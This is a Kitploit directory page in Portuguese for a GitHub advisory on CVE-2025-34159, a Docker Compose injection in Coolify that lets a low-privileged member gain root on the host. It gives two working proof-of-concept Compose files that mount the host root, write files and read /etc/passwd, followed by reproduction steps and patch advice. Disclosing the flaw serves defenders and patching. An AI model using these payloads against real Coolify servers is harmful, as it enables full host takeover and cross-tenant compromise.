Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-34159 — A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on | Kitploit
Ferramentas/GitHubGitHub/eyodav/cve-2025-34159
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCloud SecurityMisconfigurationRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

GitHub
eyodav/cve-2025-34159

CVE-2025-34159

Ver Repositório
há 11 mesesAinda não revisado

A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on

Compartilhar

CVE-2025-34159: Injeção de Docker Compose no Coolify

Visão Geral da Vulnerabilidade

CampoValor
ID do CVECVE-2025-34159
AfetaCoolify ≤ v4.0.0-beta.420.6
Corrigido emv4.0.0-beta.420.7
GravidadeCrítica
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (Injeção de Comandos do SO), CWE-20 (Validação de Entrada Incorreta)

Resumo Executivo

Uma vulnerabilidade crítica de Execução Remota de Código (RCE) existe no fluxo de implantação de aplicações do Coolify. Esta falha permite que um membro com privilégios baixos injete diretivas arbitrárias do Docker Compose durante a criação ou atualização de projetos. Ao definir um serviço malicioso que monta o sistema de arquivos do host, um atacante pode alcançar execução de comandos a nível de root no sistema operacional do host, contornando completamente o isolamento do contêiner.


Impacto na Segurança

  • Execução arbitrária de comandos no sistema host com privilégios de root
  • Comprometimento total do host incluindo capacidade de ler/escrever arquivos do sistema, estabelecer persistência e realizar movimento lateral
  • Violação de segurança multi-inquilino potencialmente comprometendo outros usuários e equipas na mesma instância
  • Contorno de controles de segurança tornando irrelevantes as restrições de acesso ao terminal da UI (controles 403)

Detalhes Técnicos

Versões Afetadas

  • Versões Vulneráveis: Coolify ≤ v4.0.0-beta.420.6
  • Versão Corrigida: v4.0.0-beta.420.7

Vetor de Ataque

A vulnerabilidade existe no fluxo de implantação de projetos, onde as configurações de Docker Compose fornecidas pelo utilizador são processadas sem validação ou isolamento suficientes.


Prova de Conceito

PoC 1: Montagem da Raiz do Host com Execução de Comandos

root@kitploit:~
version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /host/etc/passwd
      "

Resultado: Após a implantação, /tmp/proof_rce.txt aparece no sistema host, confirmando RCE com privilégios de root.

PoC 2: Escrita Direcionada num Caminho do Host

root@kitploit:~
version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

Passos de Reprodução

  1. Autentique-se como um utilizador de nível membro (não administrador)
  2. Crie ou edite um projeto no Coolify
  3. Forneça uma configuração maliciosa usando um dos payloads de Docker Compose acima
  4. Implante o projeto
  5. Verifique a exploração verificando artefactos do lado do host (por exemplo, /tmp/proof_rce.txt) ou revendo a saída de comandos nos logs de implantação

Ações Imediatas

  1. Atualize imediatamente para Coolify v4.0.0-beta.420.7 ou posterior
  2. Revise projetos existentes em busca de configurações potencialmente maliciosas de Docker Compose

Referências

  • Notas de Patch/Lançamento: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • Repositório de Aviso/PoC: https://github.com/Eyodav/CVE-2025-34159
Baixar ferramenta